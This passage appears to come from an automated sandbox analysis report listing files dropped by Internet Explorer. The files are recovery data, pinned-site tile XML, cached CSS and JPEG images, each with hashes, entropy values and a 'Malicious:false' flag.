                                                SHA1:615776BB7BCD79A4D446C559FAFBBF0F1228C9AF
                                                SHA-256:FBCAF2B9B584CFFEE987204269B5FE4B36D4C96515C7EC2CC12559ACF7133DF4
                                                SHA-512:625D7C2F8B40109A190A0CC45A3A2852173A6C517D8167CB147FFA3F31C97E210E5E77A384D68B829286104E6065C4C701B65ECC176B329D965CE1771E642227
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EA368F0D-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):24700
                                                Entropy (8bit):1.7419865277306803
                                                Encrypted:false
                                                SSDEEP:48:Iw6GcprrGwparG4pQfGrapbSfGQpBuGHHpc7TGUp8duGzYpmpMtGopMDEJhvgo8M:r+ZlQt6jBSJj92VWdCM+fOcqzLg
                                                MD5:6D9D817E4753D44623AC4D2882A70FDC
                                                SHA1:D0A22ACB7FD1FF8D765759685BCB2395FC58849E
                                                SHA-256:5BF84FC7364A498BD56B7C0ECCEE99689EEFE6727F11B55880538BAFB99441C4
                                                SHA-512:E4211E6C16C526DDF85ECAEDCAA4364FD9E3B43A7B583B5BFDF88EB32C242F52FDA06F16F0DB36801B133E44379AA692BE87E0A7C8960BF51E04409C9BBB4674
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F1137908-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27376
                                                Entropy (8bit):1.847563322290461
                                                Encrypted:false
                                                SSDEEP:96:rTZUQA6uBSAjd2pWTMT6Xzwcz56xXzwcz50zwccA:rTZUQA6ukAjd2pWTMT6k3xky7A
                                                MD5:C0BF9BA0FE9BBD40D20CE1AA29C8BF70
                                                SHA1:5DCFC2224767B65C1B8E2BF5354F59DCC1998F87
                                                SHA-256:C51BD3B9A28DBF457CA97288CE09F276276AF176B0CE330213EE21E7C7827227
                                                SHA-512:907388B483EBCB555950DE53475B15077DBB468CC9F2D4D111B0CAB2DFB7B5060F050E2CA8B9B73963F2CA9C44CA685EBC3F4AFF5ABD9F249819A04F97D176F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F113790A-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27448
                                                Entropy (8bit):1.8706165986701966
                                                Encrypted:false
                                                SSDEEP:96:rEZrQ76lBSAjt2KVWOM+yPdV73RPdV79HA:rEZrQ76lkAjt2eWOM+yVZ3RVZJA
                                                MD5:E3053ACE134DB1A7FECD910F866690F3
                                                SHA1:28DB3A2210973C0C5F18280B972B1D6403F45199
                                                SHA-256:DA4A80B032EC4ACDD13BCD8F0D80ECB14BF4A6827DA383695380E30FA9A41E6A
                                                SHA-512:B4A692F1ACC1C5EB8681DC80DE16B6446A1CF550C73D685618228247B0A683EC658570ADDB5B2C2C283AAC00B77D592D0459899CAED2BB439C87DABF556E479E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FEB7EC9C-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27388
                                                Entropy (8bit):1.8523360764499817
                                                Encrypted:false
                                                SSDEEP:96:rmZ7Qn6ZBSnjx2pWNMTOOxS5CROxS5FxRA:rmZ7Qn6Zknjx2pWNMTOeR5A
                                                MD5:DD8AE832AFB903C9B18E6B1D61AC58E1
                                                SHA1:3B4DD425CD1305666F00FA475E58F2B8BD76B249
                                                SHA-256:4F37F939CEF884820C5C2C55D8103D36AE8F63D5227F6FABA17DE5A4DD6DEC9B
                                                SHA-512:C65B39D71AAF4AD86E8D6888257EBFCC4314B496B4E9C96F796763BBC9C38CB420B4FC2A6A9DD4C42A0C9E64826979587DD0CFFAA57DA7CE13C431037C6DBD46
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):657
                                                Entropy (8bit):5.066571197176442
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxOE40+R0++nWimI002EtM3MHdNMNxOE40+R0++nWimI00ONVbkEtMb:2d6NxOp0+R0++SZHKd6NxOp0+R0++SZa
                                                MD5:DB4B6C993374FAF55CDD37B42729285A
                                                SHA1:DB107DDFA39A62693B5A013A1B402C496CAF4C6F
                                                SHA-256:458F8C41465D1C236C4E851E2F0A6BC5EA4D6429DD9D26C1FD3A94BB03F4497F
                                                SHA-512:194EBAF567AD9B6C9D501428673C8FC5B5AA00FE64E883FEDC5536BCE680F7930B713563029CC9192C6CBD47F84FF0312AEEE1AB38B9FAE57285A553247A6617
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.075376408075038
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxe2k46VnWimI002EtM3MHdNMNxe2k46VnWimI00ONkak6EtMb:2d6NxrJ6VSZHKd6NxrJ6VSZ72a7b
                                                MD5:7351E15FB910F2518E52F7B5B1518CFB
                                                SHA1:8F1B45B2F7C9341428A2014F2ECD2A7997AA42D7
                                                SHA-256:8013CBF091BDB50F157E6B187E282AEBC9643B7A6B850AA6A2A982FC99908C76
                                                SHA-512:C2238B065D8D9FAFD8A5067BB75F7B8A92E3644398ADC01F5D98D58FE7F85D623D9C140BC281680EDD13F1D9BB81CECCC7BB2DDFD686E13EADCFB05E331C267C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb2e0c76a,0x01d7a671</date><accdate>0xb2e0c76a,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb2e0c76a,0x01d7a671</date><accdate>0xb2e0c76a,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):663
                                                Entropy (8bit):5.084691494426712
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxvL40+R0++nWimI002EtM3MHdNMNxvL40+R0++nWimI00ONmZEtMb:2d6NxvM0+R0++SZHKd6NxvM0+R0++SZW
                                                MD5:5DC3C7FE6B57E402304D79EC7DE12A0E
                                                SHA1:AE5E5209C3F853B7CD383414D062A49E840BF285
                                                SHA-256:C1726F48BE061C62984ABDDF9284BF823FCC4036EACE468DD52507FA87DE6B00
                                                SHA-512:7904BC0E82B43D7A3FECA23E680F3B43103AB6CD3A02F7A6FC5E3DB33DB93F759989B6D4D37FB63245B697D5A6404BF6EA3C88DA594232A8587F7E06B5F1502E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):648
                                                Entropy (8bit):5.077114886903433
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxi4cccnnWimI002EtM3MHdNMNxi4cccnnWimI00ONd5EtMb:2d6Nx3tiSZHKd6Nx3tiSZ7njb
                                                MD5:48000DFED5C5704AA67940F3658534B9
                                                SHA1:59AACC7518629450FCEB56DA97CF976AFAD455F8
                                                SHA-256:9BF50996C1C559E32A753613950D1A044F9F7B5F4E9584A7BF666C3F4ECAFD26
                                                SHA-512:BBCD6834716654848F8EFD76CD8DFEBDEF73C77F6A2CA0D3B94D22B92343F3FA13E991C3F0EB1F4BD44644EDEF6607900B6E61801E802FF8151046B28732EB9D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):657
                                                Entropy (8bit):5.094835167959827
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxhGw40+R0++nWimI002EtM3MHdNMNxhGw40+R0++nWimI00ON8K075Ety:2d6NxQl0+R0++SZHKd6NxQl0+R0++SZ0
                                                MD5:3F7E8278DDA631F8B8D3D51787D81E5E
                                                SHA1:D7F1B4B4381BAD2FD5E5140D9B454DFA352E1082
                                                SHA-256:0381A691636E049A93370964A9D3C68BD8E1286BE152F569FA0031F7FB83F68A
                                                SHA-512:53093A6A9932ABD9758D2DE8E3AB7025BDDDDB37EE77AB3604B01E1316826AE11D62521E4A5A7EAB2D33CD245459EB38C4FFDD588A92B2C2C2338136A9D98AC2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.067645627235869
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNx0n40+R0++nWimI002EtM3MHdNMNx0n40+R0++nWimI00ONxEtMb:2d6Nx040+R0++SZHKd6Nx040+R0++SZR
                                                MD5:8E07D737BB0474328B4E0F2C4FE59A74
                                                SHA1:0D856BFE8DA5AD7EA100A5672DA7551B6F3BF512
                                                SHA-256:75275CA06F3026FB3860595D068D4FA3A0E220139DC55CE05DA121AE9E8F8F70
                                                SHA-512:15C62F8C8C87C1A1E3222A4C4A67C7E06AAB8E0036C66CF1F1AAD9E85B7FDBC6ECBAA4E8D21B6BD06B43BA5CE855FE4DA9F5DE97D60F1CBD34DB4C9A147A99B6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):657
                                                Entropy (8bit):5.1071082343012435
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxx4cccnnWimI002EtM3MHdNMNxx4cc0++nWimI00ON6Kq5EtMb:2d6NxStiSZHKd6NxSt0++SZ7ub
                                                MD5:6ECC185C7B4C3F5FE422CF895B831264
                                                SHA1:6D11A1348565F4ADCCD1C1ACB23E776A7F5E0FC5
                                                SHA-256:3ACA4D0649C3B591ACFD9DDCC26436FF2A577ADE00EC7F82A1E3666542918A30
                                                SHA-512:3FB3B766FBA2C442A7DC3BE22421952AFB720B9B413DB6325BD7CD4D2B036ED61371E977516CEFF140EC8EA23EE2E552E247F02A741AF57DD862170543B14DD9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):660
                                                Entropy (8bit):5.077904895885331
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxc4cccnnWimI002EtM3MHdNMNxc4cccnnWimI00ONVEtMb:2d6NxRtiSZHKd6NxRtiSZ71b
                                                MD5:03A01CF8F1ECD75E1FE5490A26D96BA6
                                                SHA1:F7822BC6A2DA24560015A6881CFB553467B6C4D5
                                                SHA-256:FD740BFE75B14A664EB62DF5192CC7C6D9157D67F1EEC262711B90570B15D981
                                                SHA-512:87A1E76D7BCD1A93106464779E57A7CE0EE4FAC8D831FAA0E1708DCD5F76960DAC5CBF2198945E81113BF7C84EC6BBE29E0D31208AD4EB8444C159677C55D74E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.062686638321148
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxfn4cccnnWimI002EtM3MHdNMNxfn4cccnnWimI00ONe5EtMb:2d6NxAtiSZHKd6NxAtiSZ7Ejb
                                                MD5:B78F832D53CDFFFD5776EECE23F1E5BF
                                                SHA1:51FAB597ADF4AC517103B12575A271CAA93321C8
                                                SHA-256:5E372E3142FBC01E3088499FC673AB44FF128BDB8DCBE6335E99375236C04A59
                                                SHA-512:4B1BF57B0A6C3D7804126ED62EE6CC219FB2DED1F093EA263049F8327369B3D939F03E38DB409B4438A5B6EF7FBCCD11601864F76FDC41B0A228AB6ACEE7C998
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):934
                                                Entropy (8bit):7.0276779480442535
                                                Encrypted:false
                                                SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGl0:u6tWu/6symC+PTCq5TcBUX4bL0
                                                MD5:7E98C7E46D037EE20D5CE6AAA0931B7C
                                                SHA1:BECF6B519EA551C01DA11AA0A3EB416842E87A9B
                                                SHA-256:1CBFDD7FAABF5EA51B85EEC8F5E3CE5084362AD44DE62DC7A64C32EE01603DB6
                                                SHA-512:22CA875C1D50B74B005AB9C49CDE4614A295D845166C5C53800F264E9879EE5CDDBDCAA0225E124A0E40AEFE87C617461FB9DA19EA81BC5F69F2B497483FBF47
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\2d-0e97d4-185735b[1].css
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):251398
                                                Entropy (8bit):5.2940351809352855
                                                Encrypted:false
                                                SSDEEP:3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
                                                MD5:24D71CC2CC17F9E0F7167D724347DBA4
                                                SHA1:4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
                                                SHA-256:4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
                                                SHA-512:43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: /*! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' */....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\87e5c478-82d7-43e3-8254-594bbfda55c7[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                Category:dropped
                                                Size (bytes):65009
                                                Entropy (8bit):7.978070488745874
                                                Encrypted:false
                                                SSDEEP:1536:9FPgE3ptlMp+ZlzOaTc5+vRDXjHyqhLhZa:9FPN37+p+ZHTc0vBjhLO
                                                MD5:7C62F2F02EF85B35216972F6294E279D
                                                SHA1:C4A6E45B4EDC3B8E14B78D78EBA891B20D7B10DD
                                                SHA-256:BC9E5E2000EE4C67C13331AAEF6B085ACC2280A64AA4AD4AFE23FF47F6F527AF
                                                SHA-512:8BB9BE0055FE514818F158B8E037C6B0ADED54F6E81066A955DD85EA2A0D2ECEE01A584A48C8DE46660F789743DBA6D6B0F440AD6BA8AF4D664139910311F8CC
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfFRV[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                Category:dropped
                                                Size (bytes):2754
                                                Entropy (8bit):7.844425834747859
                                                Encrypted:false
                                                SSDEEP:48:QfAuETA+wjpk5kCLsIZDP21yDvkDHCIY1x3pf7nM4kR1izuW3keUpEpso:Qf7EElWkCLjP21yADHCtx3pfyREj3kUN
                                                MD5:C830ED87471EDAE5A549A8374D0E44AA
                                                SHA1:ECCD1AD8688D25F74D6F9CDDEB938D0316DC5672
                                                SHA-256:D565D9A2812A5FF3057ECD3F8450174294FE18A604B5174B6808CFFFFE49155C
                                                SHA-512:4B72FC23FE713F9BD21E4B8077F99AAAE969749FF4DDA41B1C411E32D9F50C50B2B7141D82D5C305E1C181813FD3FA68E2E54402D3CAA3D9D14269528F97D2FD
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfJsZ[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                Category:dropped
                                                Size (bytes):2490
                                                Entropy (8bit):7.830846007357338
                                                Encrypted:false
                                                SSDEEP:48:QfAuETASNLIt+OSmfUyYuQ8tUnAGtl2hZZL1zG4tTCJ:Qf7EpIyyUyfntUnAOlW1zGIy
                                                MD5:6FA342BB2DAD0272A38CCF9D8B599264
                                                SHA1:65FEE20BEB7A5735412D9759B2E5FA1CAECA27A1
                                                SHA-256:74C1C1A5A96916E147002ECA860D303A57942161D3D7F9F2AAAA6A1CF4EB30E2
                                                SHA-512:2CA505CD6D2B18A510785187B69BED0F3A7050EC15D157AEF187901E1FE149AFFD8A6CF67C1BA628A323CA4252F4D723A4E29D3D5C5BBDF8C06816A78477C39B
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfKbP[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):9208
                                                Entropy (8bit):7.93658004874926
                                                Encrypted:false
                                                SSDEEP:192:QoZjbcNMrOy2jZoc2apHaejRWSNIHxLf5T0yjPpWYcTxxx9e3rCA:btcC6D12C6SkVr5oylTUxI3rCA
                                                MD5:13E43269EC124CC169F9E7EAE844908C
                                                SHA1:0D953E27B371182B613648BF1BA585E268CA571E
                                                SHA-256:9F6AB9EF0637CBA274ADC44222A53F9D7314E6A73B722F501F2C8ADBF8C34180
                                                SHA-512:AFB631ACD7B3F71CAC612A0ED607CBF17C2B731A5A2C293711AFB29490E7ACE6C3D7EC78393D3225466A62E13B288141243A5F14D0FA0AB78401B1BE0F2C8D3C
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgC8A[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):12670
                                                Entropy (8bit):7.875186553788666
                                                Encrypted:false
                                                SSDEEP:192:Q22scmzDWyJIs7cjUqmLAyY3xBbcd+ZWcQLO+iXFCZW/a0uYU5vgXcfftbpVJYHl:N2sH+yqs7YtGLCOJrWC0up5vcG1OdD
                                                MD5:CE2297A18E3F164E080B69C237F69B8D
                                                SHA1:018A08794ABF8C1C7D2BDFAAC807BD9ACE38EB0A
                                                SHA-256:8E1F7F1B098BC68A099D17344DE4310C165E7F48B56853C269F44CF55E771519
                                                SHA-512:693166E7470F31C0962F996D27348D4F76795DE7C31C8BE75A5F862CCABD262A9D2732A12AD823621BAB58AAD7A3DB7580D69F1CDDD20AA800699ACF39D721BE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: JFIF header followed by binary JPEG data (non-printable bytes omitted)
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgJnJ[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):11532
                                                Entropy (8bit):7.851516433481847
                                                Encrypted:false
                                                SSDEEP:192:Q2JEDuAiMDafoxvWYzzawyHZvxczunLlArDYUbG272hGfc9wBuKEPlxP:NJLAgT8AZWzuLleYr3GfcfK4lxP
                                                MD5:583AD5872841584F57A8D272DBEF1F75
                                                SHA1:7DCEA6EC88FC3091D5F9B6591C461ED9412307B3
                                                SHA-256:DA23C9C4E4ACB95DB36BFF69DEEDF8152B63A84E932D3B17DC63B2D01B885765
                                                SHA-512:709ABC7640C2D509E36B9A428DB8B3DE2247A64AD0AA06704865343046C4A0309C6E4B9808274DDD84911D0B3FC2ACCAF3E7892A224E348D027AF88A99F08F97
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: JFIF header followed by binary JPEG data (non-printable bytes omitted)
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgQuh[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):20560
                                                Entropy (8bit):7.937929871385382
                                                Encrypted:false
                                                SSDEEP:384:NRsH8HzZZclei6WeMXHl7Sp+fAtdzY8M8D2VCjFjCudbXbVzbO:N0u7cqMXZLi55jo
                                                MD5:A01C83C62C30D97DF34FEFBB82A71BC0
